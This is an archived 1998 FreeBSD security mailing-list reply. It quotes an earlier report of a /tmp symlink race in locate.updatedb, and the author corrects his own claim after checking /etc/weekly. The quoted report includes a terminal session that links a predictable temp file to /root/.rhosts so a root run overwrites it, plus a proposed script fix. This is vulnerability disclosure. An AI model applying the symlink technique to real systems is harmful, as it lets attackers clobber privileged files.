FreeBSD Mail Archives

Date:      Fri, 24 Apr 1998 20:40:08 +1000 (EST)
From:      Nicholas Charles Brawn <ncb05@uow.edu.au>
To:        freebsd-security@FreeBSD.ORG
Subject:   Re: Symlinks again...
Message-ID:  <Pine.SOL.3.96.980424203815.18480A-100000@banshee.cs.uow.edu.au>
In-Reply-To: <Pine.SOL.3.96.980423160425.8809A-100000@banshee.cs.uow.edu.au>

Time for a quick "oops" email. :)

Upon a little debate over whether or not /etc/weekly su's to nobody before
running locate.updatedb, I checked it out myself.

>From /etc/weekly:
echo ""
echo "Rebuilding locate database:"
locdb=/var/db/locate.database
touch ${locdb}; chown nobody ${locdb}; chmod 644 ${locdb}
echo /usr/libexec/locate.updatedb | nice -5 su -fm nobody 2>&1 |\
        fgrep -v 'Permission denied'        ^^^^^^^^^^^^^ 
chmod 444 ${locdb}

I stand corrected. :)

Nicholas Brawn

--
Email: ncb05@uow.edu.au 
Nicholas Brawn - Computer Science Undergraduate, University of Wollongong.

On Thu, 23 Apr 1998, Nicholas Charles Brawn wrote:

> Another symlink problem.
> 
> The script /usr/libexec/locate.updatedb and /usr/libexec/locate.mklocatedb
> create predictable filenames in /tmp. Example attack is shown below.
> 
> nbrawn@devel:~$ uname -a
> FreeBSD devel 2.2.6-RELEASE FreeBSD 2.2.6-RELEASE #0: Sun Apr 19 18:51:09 EST 
> 1998     root@devel:/usr/src/sys/compile/devel  i386
> nbrawn@devel:~$ ls /tmp
> total 2
> drwxrwxrwt   2 bin   bin    512 Apr 23 15:28 ./
> drwxr-xr-x  18 root  wheel  512 Apr 23 15:14 ../
> nbrawn@devel:~$ /usr/libexec/locate.updatedb
> 
> [1]+  Stopped                 /usr/libexec/locate.updatedb
> nbrawn@devel:~$ ls /tmp
> total 2
> drwxrwxrwt   2 bin     bin    512 Apr 23 15:28 ./
> drwxr-xr-x  18 root    wheel  512 Apr 23 15:14 ../
> -rw-------   1 nbrawn  bin      0 Apr 23 15:28 _mklocatedb575.list
> -rw-r--r--   1 nbrawn  bin      0 Apr 23 15:28 _updatedb571
> nbrawn@devel:~$ fg
> /usr/libexec/locate.updatedb
> locate.mklocatedb: cannot build locate database
> nbrawn@devel:~$ ps
>   PID  TT  STAT      TIME COMMAND
>   172  v2  Is     0:00.37 -bash (bash)
>   173  v3  Ss     0:00.96 -bash (bash)
>   584  v3  R+     0:00.00 ps
> nbrawn@devel:~$ ln -s /root/.rhosts /tmp/_mklocatedb591.list
> nbrawn@devel:~$ su
> Password:
> su-2.01# /usr/libexec/locate.updatedb 
> 
> [1]+  Stopped                 /usr/libexec/locate.updatedb
> su-2.01# ls /tmp
> total 2
> drwxrwxrwt   2 bin     bin    512 Apr 23 15:29 ./
> drwxr-xr-x  18 root    wheel  512 Apr 23 15:14 ../
> lrwxrwxrwx   1 nbrawn  bin     13 Apr 23 15:29 _mklocatedb591.list@ -> /root/.rhosts
> -rw-r--r--   1 root    bin      0 Apr 23 15:29 _updatedb587
> su-2.01# fg
> /usr/libexec/locate.updatedb
> su-2.01# ls /root/.rhosts
> -rw-------  1 root  wheel  439009 Apr 23 15:30 /root/.rhosts
> su-2.01# exit
> exit
> nbrawn@devel:~$
> 
> The problem appears easily fixed by editing the problem scripts and adding a
> few lines:
> 
> #!/bin/sh
> #
> # Copyright (c) September 1995 Wolfram Schneider <wosch@FreeBSD.org>. Berlin.
> # All rights reserved.
> 
> [snip]
> 
> # mklocatedb - build locate database
> # 
> # usage: mklocatedb [-presort] < filelist > database
> #
> # $Id: mklocatedb.sh,v 1.2.2.1 1997/12/13 18:21:02 sef Exp $
> 
> [snip]
> 
> umask 077			# protect temp files
> 
> export ROOTDIR=/var/run
> TMPDIR=${TMPDIR:-/tmp}; export TMPDIR
> if test X"$TMPDIR" = X -o ! -d "$TMPDIR"; then
> 	TMPDIR=/tmp; export TMPDIR
> fi
> 
> [snip]
> 
> if [ "$USER" != "root" ] 	# won't work if su'ing, someone think of a
> then				# better check :)
> bigrams=$TMPDIR/_mklocatedb$$.bigrams
> filelist=$TMPDIR/_mklocatedb$$.list
> else
> bigrams=$ROOTDIR/_mklocatedb$$.bigrams
> filelist=$ROOTDIR/_mklocatedb$$.list
> fi
> 
> How many other programs/scripts in FreeBSD -stable and -current are
> using /tmp that should be using /var/run?
> 
> Nicholas Brawn
> 
> ps, sorry for the long post :)
> --
> Email: ncb05@uow.edu.au
> Nicholas Brawn - Computer Science Undergraduate, University of Wollongong.
> 
> 
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe security" in the body of the message
> 


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe security" in the body of the message

Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?Pine.SOL.3.96.980424203815.18480A-100000>

Header And Logo

Peripheral Links

Site Navigation

Header And Logo

Peripheral Links

Search

Site Navigation